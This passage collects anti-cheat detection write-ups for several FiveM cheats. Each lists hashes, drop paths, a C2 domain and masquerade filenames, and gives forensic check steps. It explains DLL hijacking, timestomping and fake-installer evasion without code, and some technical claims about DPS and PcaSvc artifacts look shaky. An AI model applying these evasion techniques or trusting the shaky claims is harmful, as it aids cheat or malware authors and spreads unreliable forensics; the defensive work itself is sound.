security@clubhouseac.shop. --- # SSTB FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished SSTB FiveM cheat detection & forensic artifacts =============================================== SSTB is a FiveM cheat that uses a fake ffmpeg.dll as its injection vector. Four variants have been identified, each masquerading as a different legitimate application: Obsidian/CitizenFX, SteelSeries GG, Insomnia, and Rocket.Chat. The DLL SHA-1 is 7cbd8a2260baae33ec3f7a5b2427fbea14d2a9a5. CR Clubhouse AC Research June 2, 2026 8 min read Summary * Injects via a fake ffmpeg.dll placed in the directory of a legitimate application — DLL hijacking. * Four known application targets: Obsidian/CitizenFX, SteelSeries GG, Insomnia, Rocket.Chat. * SHA-1 7cbd8a2260baae33ec3f7a5b2427fbea14d2a9a5 identifies the malicious DLL. * Detection: check for ffmpeg.dll in application directories where it does not belong, then hash-verify. Overview -------- SSTB uses a DLL hijacking technique to load its cheat payload. It drops a malicious ffmpeg.dll into the installation directory of a legitimate application that loads ffmpeg.dll at startup. When the host application runs, Windows loads the malicious DLL instead of the legitimate one, executing the cheat payload within the context of a trusted process. Four target applications have been identified across known SSTB variants: * **Obsidian / CitizenFX** — note-taking app and FiveM's own CitizenFX launcher both load ffmpeg.dll at startup * **SteelSeries GG** — gaming peripheral software * **Insomnia** — API client application * **Rocket.Chat** — messaging platform desktop client The presence of a non-standard ffmpeg.dll in any of these application directories is an immediate red flag. Sample metadata (IOC) --------------------- ffmpeg.dll (SSTB) — file indicatorsIOC Name ffmpeg.dll (malicious — DLL hijack) Cheat SSTB SHA-1 7cbd8a2260baae33ec3f7a5b2427fbea14d2a9a5 Target dirs Obsidian %APPDATA%\\obsidian\\ CitizenFX %LOCALAPPDATA%\\FiveM\\FiveM.app\\ SteelSeries %PROGRAMFILES%\\SteelSeries\\GG\\ Insomnia %APPDATA%\\Insomnia\\ Rocket.Chat %LOCALAPPDATA%\\Rocket.Chat\\ Behavioral indicators --------------------- ### DLL hijacking via ffmpeg.dll The malicious ffmpeg.dll is placed in the application's own directory. Windows' DLL search order prioritises the application directory over System32, so the cheat DLL is loaded instead of the legitimate ffmpeg library. The host process (Obsidian, SteelSeries GG, etc.) loads normally from the user's perspective, but SSTB is now running inside it. ### Identifying the malicious DLL The legitimate ffmpeg.dll bundled with applications like Obsidian is signed by the respective software vendor or the FFmpeg project. The malicious SSTB DLL is unsigned. Additionally, the file size and SHA-1 hash will differ from any legitimate ffmpeg build. ### Cross-variant identification All four variants share the same SHA-1 hash 7cbd8a2260baae33ec3f7a5b2427fbea14d2a9a5, indicating the same underlying payload is used across different application targets. The only difference between variants is the target application directory. Screenshare check guide ----------------------- 1 ### Check ffmpeg.dll in application directories * Navigate to the installation directories of Obsidian, CitizenFX/FiveM, SteelSeries GG, Insomnia, and Rocket.Chat. * Check for the presence of ffmpeg.dll in each directory. Its presence is expected in some of these — proceed to hash check. 2 ### File hash verification * For each ffmpeg.dll found, compute its SHA-1. * Match against 7cbd8a2260baae33ec3f7a5b2427fbea14d2a9a5. Any match is the SSTB cheat DLL. * Legitimate ffmpeg DLLs will have a different hash and typically carry a valid signature. 3 ### Digital signature check * Right-click the DLL → Properties → Digital Signatures. * The SSTB DLL is unsigned. Legitimate ffmpeg builds may or may not be signed depending on the bundling application. 4 ### Process module list * In System Informer, check the modules loaded by Obsidian, SteelSeries GG, Insomnia, or Rocket.Chat. * If ffmpeg.dll is loaded from the application's own directory rather than System32 or a known path, inspect it. 5 ### Journal Trace for DLL drops * Run a Journal Trace search for ffmpeg.dll creation events in application directories. * A recent creation event in an app directory (not System32) is suspicious. 6 ### Browser and Discord * Check browser history and downloads for references to SSTB or unusual DLL downloads. * In Discord, check **User Settings → Authorized Apps**. Detection summary ----------------- Artifact matrix — SSTB / ffmpeg.dll hijackSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────────── Malicious ffmpeg.dll on disk Yes (if not deleted) App directory SHA-1 hash match Yes (file on disk) File system Journal Trace DLL creation event Yes Journal Trace Unsigned DLL in app directory Yes (file on disk) File properties The most actionable indicator is a **SHA-1 match on ffmpeg.dll in any of the four known target application directories**. A Journal Trace search for ffmpeg.dll creation events in non-system paths provides a persistence-independent confirmation. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Flyside FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Flyside FiveM cheat detection & forensic artifacts ================================================== Flyside is a FiveM cheat that masquerades as cmd.exe, drops TModule.dll directly into the root of C:\\, and communicates with C2 gm07-dc04.ouiheberg.com. Its SHA-256 is 01939a2b6ac191c4afb03884c0e6f172c2332c4e4bf4f516718b585541dd31c4. CR Clubhouse AC Research June 2, 2026 8 min read Summary * Masquerades as cmd.exe — distinguish by execution path (real cmd.exe is always in System32 or SysWOW64). * Drops TModule.dll to C:\\TModule.dll — this path is anomalous and has no legitimate counterpart. * C2 domain gm07-dc04.ouiheberg.com observed in DNS cache and LSASS memory during active sessions. * SHA-256 01939a2b6ac191c4afb03884c0e6f172c2332c4e4bf4f516718b585541dd31c4. Overview -------- Flyside is a FiveM cheat with a multi-indicator artifact footprint. It masquerades as cmd.exe — a process that is ubiquitous enough that users may not scrutinize it — but runs from a non-system path, distinguishing it from the legitimate Windows Command Prompt. Flyside's most distinctive persistent artifact is TModule.dll dropped directly into the root of the C: drive (C:\\TModule.dll). No legitimate Windows component or third-party application creates a DLL at the root of C:\\ with this name. It is visible in a Journal Trace search and persists independently of the loader. Sample metadata (IOC) --------------------- Flyside — file indicatorsIOC Name cmd.exe (masquerade — real cmd.exe is in System32) Brand Flyside SHA-256 01939a2b6ac191c4afb03884c0e6f172 c2332c4e4bf4f516718b585541dd31c4 Dropped C:\\TModule.dll (no legitimate origin at this path) C2 domain gm07-dc04.ouiheberg.com → Observed in: DNS cache, lsass.exe Behavioral indicators --------------------- ### TModule.dll in C:\\ root Flyside drops a file named TModule.dll directly into C:\\. This location is immediately anomalous — no legitimate Windows component or application installer places DLLs at the root of the system drive. The file persists after the cheat exits and is visible in a Journal Trace search filtered for TModule. ### cmd.exe masquerade The legitimate Windows Command Prompt executable is located at C:\\Windows\\System32\\cmd.exe or C:\\Windows\\SysWOW64\\cmd.exe. Flyside runs a fake cmd.exe from a non-system path. In the process list or Prefetch, confirm the execution path — any cmd.exe outside System32/SysWOW64 is suspicious. ### C2: gm07-dc04.ouiheberg.com Flyside contacts gm07-dc04.ouiheberg.com for license validation and payload delivery. This domain is observable in the DNS cache and in LSASS process memory during an active session. Screenshare check guide ----------------------- 1 ### TModule.dll Journal Trace * Open a Journal Trace tool and search for TModule. * A creation event for C:\\TModule.dll is definitively Flyside — no legitimate software creates this file. * Check whether the file still exists on disk at C:\\TModule.dll. 2 ### DNS cache — gm07-dc04.ouiheberg.com * Run ipconfig /displaydns or check System Informer's DNS section. * Search for ouiheberg. A cache hit confirms an active C2 connection. 3 ### Process list — cmd.exe path * In Task Manager or System Informer, check for any cmd.exe process running from outside C:\\Windows\\System32 or SysWOW64. 4 ### LSASS memory scan * Scan lsass.exe memory strings for ouiheberg. * The C2 domain string in LSASS confirms active injection. 5 ### File hash verification * If the fake cmd.exe is present on disk, compute its SHA-256. * Match against 01939a2b6ac191c4afb03884c0e6f172c2332c4e4bf4f516718b585541dd31c4. 6 ### Browser and Discord * Check browser history and downloads for references to Flyside. * In Discord, check **User Settings → Authorized Apps**. Detection summary ----------------- Artifact matrix — FlysideSummary Artifact Survives cleanup? Check location ───────────────────────────────────────────────────────────────────────────── C:\\TModule.dll Yes (if not deleted) C:\\ root / journal PcaSVC entry Yes AppCompat / DPS log DNS cache (gm07-dc04.ouiheberg.com) Session-length ipconfig /displaydns C2 strings in lsass.exe Only while running Memory string scan SHA-256 hash match Yes (file on disk) File system The most immediately actionable indicator is **C:\\TModule.dll** — a file that has no legitimate origin at the root of the C: drive. A Journal Trace search for this filename provides a persistent record even after the file is deleted. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # FiveM.exe Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished FiveM.exe Cheat future-timestamp masquerade detection ===================================================== A FiveM cheat distributed as FiveM(1).exe — a browser download rename of a file claiming to be the FiveM launcher. Its most distinctive indicator is a DPS timestamp of 2077/11/16, a far-future timestomped value that is physically impossible for any legitimately compiled binary executed today. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Distributed as FiveM(1).exe — the browser-renamed pattern suggests it was downloaded from an unofficial source. * DPS timestamp 2077/11/16 — a timestomped future date over 50 years ahead, definitively indicating tampering. * The legitimate FiveM launcher is signed by Cfx.re and distributed only via fivem.net. * Prefetch and AppCompat records persist and reveal the non-standard execution path. Overview -------- This cheat exploits the FiveM brand by naming itself FiveM(1).exe — the (1) suffix is a browser duplicate-download artefact, indicating the file was downloaded from a web source. The genuine FiveM launcher is named FiveM.exe and is signed by Cfx.re; it never carries a numeric suffix. The DPS first-seen timestamp of 2077/11/16 is a timestomped value placed over 50 years in the future. This date — which coincidentally matches the setting of a well-known video game — is deliberate and designed to cause confusion in timeline-based forensic reconstruction. No legitimately compiled binary would carry this timestamp. Sample metadata (IOC) --------------------- FiveM(1).exe — file indicatorsIOC Name FiveM(1).exe Masquerade FiveM launcher (Cfx.re) DPS stamp 2077/11/16 (future timestamp — timestomped) Signature None (legitimate FiveM is signed by Cfx.re) Behavioral indicators --------------------- ### Far-future DPS timestamp (2077/11/16) The DPS timestamp of 2077/11/16 is over 50 years in the future. This is a timestomped value — the PE timestamp was deliberately set to a future date to disrupt chronological forensic analysis. The Windows Program Compatibility Assistant records this value at first execution; its presence in AppCompat logs is definitive evidence of tampering. ### Browser duplicate-download naming pattern The (1) suffix in FiveM(1).exe indicates the file was saved by a web browser as a duplicate download — the browser already had a file named FiveM.exe in the download directory and renamed the new download. This confirms the file was obtained from a web download rather than the official FiveM installer path. ### Missing Cfx.re signature The legitimate FiveM launcher is signed by Cfx.re with a valid Authenticode certificate. This cheat binary is unsigned. A signature check immediately distinguishes it from the legitimate launcher. Screenshare check guide ----------------------- 1 ### DPS timestamp check * Inspect the PcaSVC / DPS log for FiveM(1).exe or any FiveM-named executable. * A timestamp of 2077/11/16 or any other far-future date is definitive evidence of timestomping — flag immediately. 2 ### Digital signature verification * Locate the file and right-click → Properties → Digital Signatures. * Legitimate FiveM is signed by Cfx.re. An unsigned file is not the real launcher. 3 ### Filename check — (1) suffix * The (1) suffix is a browser duplicate artefact — the real FiveM launcher never has this suffix. * Check browser download history for the source URL of the file. 4 ### Prefetch records * Check C:\\Windows\\Prefetch for FIVEM(1).EXE-\*.pf. * The Prefetch path reveals the full execution location — confirm it is not an official FiveM install path. 5 ### Browser downloads * Check browser download history for the source of FiveM(1).exe. * The official FiveM download is FiveM.exe from fivem.net only. Detection summary ----------------- Artifact matrix — FiveM(1).exe cheatSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── DPS timestamp (2077/11/16) Yes AppCompat / DPS log Missing Cfx.re signature Yes (file on disk) File properties Prefetch + path Usually C:\\Windows\\Prefetch Browser download history Browser-dependent Browser history The most immediately actionable indicator is the **DPS timestamp of 2077/11/16** — a timestomped future date that cannot appear in any legitimately compiled binary. The missing Cfx.re signature provides immediate secondary confirmation. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Traceless FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Traceless FiveM cheat detection & forensic artifacts ==================================================== Traceless is a FiveM-targeted cheat distributed as Traceless.exe. Despite branding that implies anti-forensic capability, the cheat leaves persistent DPS and PcaSvc artifacts that are irremovable without direct registry editing. Prefetch also survives basic cleanup attempts. The name is deliberately misleading. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Despite the name “Traceless”, DPS and PcaSvc timestamps are irremovable without registry editing — the cheat's anti-forensic branding is a deliberate misdirection. * DPS first-seen timestamp of 2025/07/30 and PcaSvc entry 0x42d000 survive independently of user-side cleanup routines. * Prefetch for Traceless.exe survives basic cleanup and provides a persistent execution record. * If running, Traceless.exe is visible in the process list — no legitimate software uses this executable name. Overview -------- Traceless is a commercially distributed FiveM cheat loader. Its primary executable is named Traceless.exe and weighs approximately 4.15 MB. The product name is a direct reference to anti-forensic capability — a marketing claim that does not hold up under forensic scrutiny. Windows' Diagnostic Policy Service (DPS) and Program Compatibility Assistant (PcaSvc) both record a timestamp and entry at first execution that are stored in the registry and cannot be cleared by the same cleanup scripts that wipe Prefetch or browser history. A user who trusts the cheat's name and believes their system is clean will still carry these artifacts indefinitely. Prefetch additionally survives the most common cleanup approaches. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. Traceless.exe — file indicatorsIOC Name Traceless.exe Size 4,353,536 bytes (4.15 MB) SHA-256 128e13028f0f931d794f10374cbfdc1a550fc4590640e70763b941e09635c309 SHA-1 63f856cb2ff834b82782386b43858672c1f46037 MD5 9d198fba674f7ad4385ef51ee241d79e First seen 2025/07/30 18:09:24 UTC (DPS timestamp) PcaSvc 0x42d000 The DPS timestamp of 2025/07/30 18:09:24 is written by the Windows Diagnostic Policy Service at first execution and cannot be cleared by routine cleanup. The PcaSvc entry 0x42d000 is similarly persistent. Behavioral indicators --------------------- ### Misleading anti-forensic branding The name Traceless is a deliberate marketing choice designed to reassure users that using the cheat will not leave forensic evidence on their system. This claim is false. Two registry-backed artifact classes — DPS timestamps and PcaSvc entries — are written at first execution and persist indefinitely unless the user edits the relevant registry keys directly. This is forensically significant: a user who has attempted cleanup and believes their system is clean based on the product's name will still carry DPS and PcaSvc evidence of execution. Screenshare investigators should not be deterred by the absence of surface-level artifacts such as the binary itself or browser download history. ### DPS and PcaSvc persistence The Diagnostic Policy Service (DPS) logs program first-run timestamps in the Windows registry under the AppCompat telemetry path. The Program Compatibility Assistant service (PcaSvc) records a separate execution indicator. Both survive del operations, Prefetch clearing, and most third-party cleanup tools. Only targeted registry key deletion removes these entries — a step that itself may leave evidence of tampering. ### Prefetch survivability A Prefetch file for Traceless.exe will appear in C:\\Windows\\Prefetch following execution. While Prefetch can be cleared by an attentive user, it survives basic cleanup and provides corroborating evidence alongside the more persistent DPS and PcaSvc artifacts. Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 2 are registry-backed and cannot be cleared without direct registry editing. Steps 3–5 provide corroborating evidence. 1 ### DPS timestamp check for Traceless.exe * Use a DFIR tool to inspect the DPS log entries for Traceless.exe. * The known DPS timestamp is 2025/07/30 18:09:24. Any DPS entry for this executable name confirms prior execution and cannot be fabricated by the user after the fact. 2 ### PcaSvc entry — 0x42d000 * Inspect the PcaSvc registry keys for an entry corresponding to Traceless.exe with value 0x42d000. * This entry is written at first execution and survives standard cleanup. Its presence is definitive evidence of execution. 3 ### Prefetch for Traceless.exe * Check the Prefetch folder (C:\\Windows\\Prefetch) for a TRACELESS.EXE-\*.pf entry. * There is no legitimate process named Traceless.exe in any standard Windows or application installation. 4 ### Hash check — SHA-1 * If the binary is still present on the system, compute its SHA-1 hash and compare against 63f856cb2ff834b82782386b43858672c1f46037. * A match confirms the known Traceless build. Submit to VirusTotal for additional context. 5 ### Process list — Traceless.exe * Open Task Manager or System Informer and look for any running instance of Traceless.exe. * If found, the cheat is currently active. Confirm the executable path — it is not associated with any legitimate Windows or third-party software component. Detection summary ----------------- Artifact matrix — Traceless / Traceless.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSvc / DPS timestamp Yes AppCompat / DPS log Prefetch (Traceless.exe) Usually C:\\Windows\\Prefetch Binary (Traceless.exe) No (if deleted) Filesystem search Despite the product's name, **Traceless leaves registry-backed forensic artifacts** that cannot be removed without targeted registry editing. The DPS timestamp and PcaSvc entry are the most reliable indicators and should be checked first. Prefetch provides corroborating evidence. Investigators should not be misled by the absence of the binary itself or surface-level cleanup. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # SouthLoader FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished SouthLoader FiveM cheat detection & forensic artifacts ====================================================== SouthLoader is a FiveM cheat distributed in two known variants: SouthLoader.exe (self-branded) and NVIDIA\_app\_v11.0.4.526.exe (NVIDIA masquerade). The self-branded variant is trivially identified by name; the NVIDIA variant is distinguished by a missing NVIDIA Corporation signature and anomalous execution path. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Two variants: SouthLoader.exe (self-branded, immediately identifiable) and NVIDIA\_app\_v11.0.4.526.exe (NVIDIA masquerade). * The NVIDIA variant lacks a valid NVIDIA Corporation Authenticode signature — the real NVIDIA App installer is always signed. * PcaSVC and Prefetch records persist for both variants after execution. * Execution path of the NVIDIA variant will be a non-NVIDIA path (Downloads, Desktop, etc.) rather than an official installer source. Overview -------- SouthLoader is distributed in two known variants. The first, SouthLoader.exe, uses the cheat's own brand name and is immediately identifiable — no legitimate software uses this name. The second variant adopts the filename NVIDIA\_app\_v11.0.4.526.exe to impersonate the NVIDIA App installer, exploiting the ubiquity of NVIDIA graphics driver software to avoid suspicion. The NVIDIA masquerade is distinguished from a legitimate NVIDIA installer by the absence of a valid NVIDIA Corporation Authenticode signature, a non-standard execution path, and a browser download origin from a non-NVIDIA source. Sample metadata (IOC) --------------------- SouthLoader — file indicatorsIOC Variant 1 SouthLoader.exe (self-branded — no legitimate software uses this name) Variant 2 NVIDIA\_app\_v11.0.4.526.exe Masquerade: NVIDIA App installer Signature: None (real NVIDIA installer is signed by NVIDIA Corp) Expected path: non-NVIDIA source / Downloads / Desktop Behavioral indicators --------------------- ### Variant 1: SouthLoader.exe — self-branded The filename SouthLoader.exe is exclusive to this cheat. Any Prefetch entry, process list entry, or AppCompat record referencing this name is definitively SouthLoader. No further analysis is required beyond confirming the name. ### Variant 2: NVIDIA masquerade The NVIDIA App is a legitimate NVIDIA software suite. The real installer is signed by NVIDIA Corporation and distributed via the official NVIDIA website or GeForce Experience. Key distinguishing factors from the cheat: * Real NVIDIA App installer: signed by NVIDIA Corporation, version numbers match official releases. * SouthLoader variant: unsigned, obtained from a non-NVIDIA download source. * Cheat version runs from Downloads, Desktop, or Discord cache rather than a standard NVIDIA installer path. Screenshare check guide ----------------------- 1 ### Prefetch — SouthLoader.exe * Check C:\\Windows\\Prefetch for SOUTHLOADER.EXE-\*.pf. * Any match is definitive — this filename has no legitimate origin. 2 ### Digital signature — NVIDIA variant * If NVIDIA\_app\_v11.0.4.526.exe is present on disk, right-click \-> Properties \-> Digital Signatures. * The real NVIDIA App installer is signed by NVIDIA Corporation. An unsigned file is not the legitimate installer. 3 ### Execution path — NVIDIA variant * In Prefetch or AppCompat, check the full execution path of NVIDIA\_app\_v11.0.4.526.exe. * Paths outside of official NVIDIA installer locations confirm this is not a legitimate NVIDIA installer. 4 ### Browser download history * Check browser download history for the source of NVIDIA\_app\_v11.0.4.526.exe. Legitimate NVIDIA software is only distributed via nvidia.com. 5 ### PcaSVC / AppCompat entry * Inspect the AppCompat PcaSVC log for entries referencing either SouthLoader.exe or the NVIDIA variant filename. Detection summary ----------------- Artifact matrix — SouthLoader (both variants)Summary Artifact Survives cleanup? Check location ───────────────────────────────────────────────────────────────────────────── PcaSVC entry (both variants) Yes AppCompat / DPS log Prefetch (SouthLoader.exe) Usually C:\\Windows\\Prefetch Missing NVIDIA signature (variant 2) Yes (file on disk) File properties For the self-branded variant, the **Prefetch entry for SouthLoader.exe** is definitive. For the NVIDIA masquerade, the **missing NVIDIA Corporation Authenticode signature** is the fastest confirmation. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # 420-Services FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished 420-Services FiveM cheat detection & forensic artifacts ======================================================= 420-Services is a FiveM cheat loader distributed as 420-services.exe. The distinctive brand name in the executable makes it trivially identifiable in Prefetch and process listings. SHA-1 888a2575b2a1d8e68ec50a9204eee52700ae168a provides unambiguous binary identification. CR Clubhouse AC Research June 2, 2026 6 min read Summary * Executable name 420-services.exe is distinctive — no legitimate software uses this name. * SHA-1 888a2575b2a1d8e68ec50a9204eee52700ae168a provides definitive binary identification. * PcaSVC and Prefetch records persist after execution. * Also associated with a PcaSVC offset of 0xb21000 in memory forensics. Overview -------- 420-Services is a FiveM cheat loader distributed under the self-branded executable name 420-services.exe. Unlike cheats that adopt generic or masquerading names, 420-Services uses a branded name that makes it immediately identifiable. No legitimate Windows service or application uses this filename. The cheat is associated with a PcaSVC memory offset of 0xb21000, which has been observed in memory forensic investigations alongside the known SHA-1 hash. Sample metadata (IOC) --------------------- 420-services.exe — file indicatorsIOC Name 420-services.exe SHA-1 888a2575b2a1d8e68ec50a9204eee52700ae168a PcaSVC 0xb21000 Behavioral indicators --------------------- ### Distinctive executable name The filename 420-services.exe is specific to this cheat. Any Prefetch entry, process list entry, or AppCompat record referencing this name is definitively associated with 420-Services. ### PcaSVC memory offset During memory forensic analysis, 420-Services is associated with PcaSVC offset 0xb21000. This offset combined with the executable name provides a dual confirmation pathway in live memory investigations. Screenshare check guide ----------------------- 1 ### Prefetch — 420-services.exe * Check C:\\Windows\\Prefetch for 420-SERVICES.EXE-\*.pf. * Any match is definitive — this filename has no legitimate origin. 2 ### Process list * Check Task Manager or System Informer for a running 420-services.exe process. 3 ### File hash verification * If the file is present on disk, compute its SHA-1. * Match against 888a2575b2a1d8e68ec50a9204eee52700ae168a. 4 ### PcaSVC / AppCompat entry * Inspect the AppCompat PcaSVC log for an entry referencing 420-services.exe at offset 0xb21000. 5 ### Browser and Discord * Check browser history and downloads for references to 420-Services. * In Discord, check **User Settings → Authorized Apps**. Detection summary ----------------- Artifact matrix — 420-ServicesSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────── PcaSVC entry (0xb21000) Yes AppCompat / DPS log Prefetch (420-services.exe) Usually C:\\Windows\\Prefetch SHA-1 hash match Yes (file on disk) File system Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # MW-Privat FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished MW-Privat FiveM cheat detection & forensic artifacts ==================================================== MW-Privat is a FiveM cheat distributed as MWPriv+\_Cheat\_x64.exe. The self-describing executable name — containing both the brand abbreviation and the string “Cheat” — is immediately identifiable. The binary is detected by 11 PE antivirus engines and carries SHA-256 b21c2afe99160f24b403962b7b15b191b785c2a4b5c38f49a5cbd74bcfd0415c. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Executable name MWPriv+\_Cheat\_x64.exe contains the string “Cheat” — self-identifying and immediately flaggable. * Detected by 11 antivirus engines based on PE analysis — high confidence malicious classification. * SHA-256 b21c2afe99160f24b403962b7b15b191b785c2a4b5c38f49a5cbd74bcfd0415c for definitive identification. * Prefetch and PcaSVC records persist after execution. Overview -------- MW-Privat is a privately distributed FiveM cheat. Its executable name MWPriv+\_Cheat\_x64.exe is self-describing — it explicitly contains the word "Cheat" alongside the brand abbreviation and architecture suffix. This makes it one of the more straightforwardly identifiable cheats during a screenshare: any Prefetch or process entry bearing this name requires no further analysis to flag. The binary is detected by 11 PE antivirus engines, confirming its malicious classification through multiple independent analysis paths. Sample metadata (IOC) --------------------- MWPriv+\_Cheat\_x64.exe — file indicatorsIOC Name MWPriv+\_Cheat\_x64.exe Brand MW-Privat SHA-256 b21c2afe99160f24b403962b7b15b191 b785c2a4b5c38f49a5cbd74bcfd0415c AV hits 11 engines (PE analysis) Behavioral indicators --------------------- ### Self-identifying executable name The filename MWPriv+\_Cheat\_x64.exe explicitly identifies itself as a cheat. No legitimate software — Windows components, game clients, or third-party applications — would include the string "Cheat" in an executable filename. Any occurrence in Prefetch or the process list is immediately actionable. ### Multi-engine antivirus detection The binary is flagged by 11 PE antivirus engines. During an investigation where the file is available, submission to a multi-engine scanner will return positive detections across multiple independent classification systems. This provides corroborating evidence independent of behavioral or timestamp indicators. Screenshare check guide ----------------------- 1 ### Prefetch — MWPriv+\_Cheat\_x64.exe * Check C:\\Windows\\Prefetch for MWPRIV+\_CHEAT\_X64.EXE-\*.pf. * The string “CHEAT” in the Prefetch filename is definitive — flag immediately. 2 ### Process list * Check Task Manager or System Informer for a running MWPriv+\_Cheat\_x64.exe process. 3 ### File hash verification * If the file is present on disk, compute its SHA-256. * Match against b21c2afe99160f24b403962b7b15b191b785c2a4b5c38f49a5cbd74bcfd0415c. 4 ### PcaSVC / AppCompat entry * Inspect the AppCompat PcaSVC log for an entry referencing MWPriv+\_Cheat\_x64.exe. 5 ### Browser and Discord * Check browser history and downloads for references to MW-Privat or MWPriv. * In Discord, check **User Settings → Authorized Apps**. Detection summary ----------------- Artifact matrix — MW-Privat / MWPriv+\_Cheat\_x64.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────────── PcaSVC entry Yes AppCompat / DPS log Prefetch (MWPriv+\_Cheat\_x64.exe) Usually C:\\Windows\\Prefetch SHA-256 hash / AV detection Yes (file on disk) File system / scanner The most immediately actionable indicator is the **Prefetch entry containing “CHEAT” in the filename** — a string that has no legitimate counterpart in any standard software. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # WhatsApp_Installer FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished WhatsApp\_Installer FiveM cheat masquerade detection ==================================================== A FiveM cheat distributed as WhatsApp\_Installer.exe to masquerade as a legitimate messaging application installer. Its most distinctive indicator is an anomalous DPS timestamp of 2049/07/01 — a future date that is physically impossible for any legitimately compiled binary executed today. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Masquerades as WhatsApp\_Installer.exe — the authentic WhatsApp installer uses a different name and valid Meta signing. * DPS timestamp 2049/07/01 is a timestomped future date — physically impossible for a binary executed now. * No valid Authenticode signature from Meta / WhatsApp LLC — the real installer is signed. * Prefetch and PcaSVC records persist and provide timestamped execution evidence. Overview -------- This FiveM cheat is distributed under the filename WhatsApp\_Installer.exe to avoid user suspicion. The authentic WhatsApp Desktop installer from Meta is signed with a valid Authenticode certificate from WhatsApp LLC and uses a distinct filename pattern. This fake installer carries no valid signature and bears an anomalous PE timestamp. The most immediately suspicious indicator is the DPS first-seen timestamp of 2049/07/01. This is a timestomped value placed far in the future — a technique used by cheat developers to confuse timeline reconstruction. No legitimately compiled binary would carry a compile timestamp more than 23 years in the future. Sample metadata (IOC) --------------------- WhatsApp\_Installer.exe — file indicatorsIOC Name WhatsApp\_Installer.exe Masquerade WhatsApp Desktop installer DPS stamp 2049/07/01 (future timestamp — timestomped) Signature None (legitimate WhatsApp is signed by Meta) Behavioral indicators --------------------- ### Future DPS timestamp (2049/07/01) The DPS first-seen timestamp of 2049/07/01 is a timestomped value. Cheat developers sometimes set PE timestamps far in the future to confuse investigators reading AppCompat logs chronologically. The Windows Program Compatibility Assistant records the DPS value at first execution — this future timestamp is therefore definitive evidence of timestomping and illegitimate software. ### Missing Authenticode signature The legitimate WhatsApp Desktop installer is signed by WhatsApp LLC (a Meta subsidiary) with a valid Authenticode certificate. This fake installer is unsigned. Right-clicking the file and checking its **Digital Signatures** tab will show no valid signature. ### Masquerade context The choice of WhatsApp as a masquerade is deliberate — it is a ubiquitous application that many users would install without scrutiny. Investigators should check the file path: the real WhatsApp installer typically runs from the Downloads folder or a known software source, while cheat loaders often run from unusual paths such as Desktop subdirectories, temporary folders, or Discord download caches. Screenshare check guide ----------------------- 1 ### DPS timestamp check * Inspect the PcaSVC / DPS log for WhatsApp\_Installer.exe. * A timestamp of 2049/07/01 or any future date is definitive evidence of timestomping — flag immediately. 2 ### Digital signature verification * If the file is present on disk, right-click → Properties → Digital Signatures. * The legitimate WhatsApp installer is signed by WhatsApp LLC. An unsigned file or a signature from any other entity is suspicious. 3 ### File path and origin * Check where the file was executed from. Execution from unexpected paths (Desktop folders, temp dirs, Discord cache) is suspicious. * Cross-reference with browser download history to determine the source. 4 ### Prefetch records * Check C:\\Windows\\Prefetch for WHATSAPP\_INSTALLER.EXE-\*.pf. * Note the Prefetch entry path — it reveals the full execution path of the binary. 5 ### Browser and Discord * Check browser downloads and Discord download cache for the source of WhatsApp\_Installer.exe. * Legitimate WhatsApp downloads come from web.whatsapp.com or the Microsoft Store — any other source is suspect. Detection summary ----------------- Artifact matrix — WhatsApp\_Installer.exe FiveM cheatSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── DPS timestamp (2049/07/01) Yes AppCompat / DPS log Missing Authenticode signature Yes (file on disk) File properties Prefetch record Usually C:\\Windows\\Prefetch Download history / source path Browser-dependent Browser history The most immediately actionable indicator is the **future DPS timestamp (2049/07/01)** — a timestomped value that cannot appear in any legitimately compiled binary executed in the present. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Trigger FiveM Cheat (Rechner.exe): Detection & Forensic 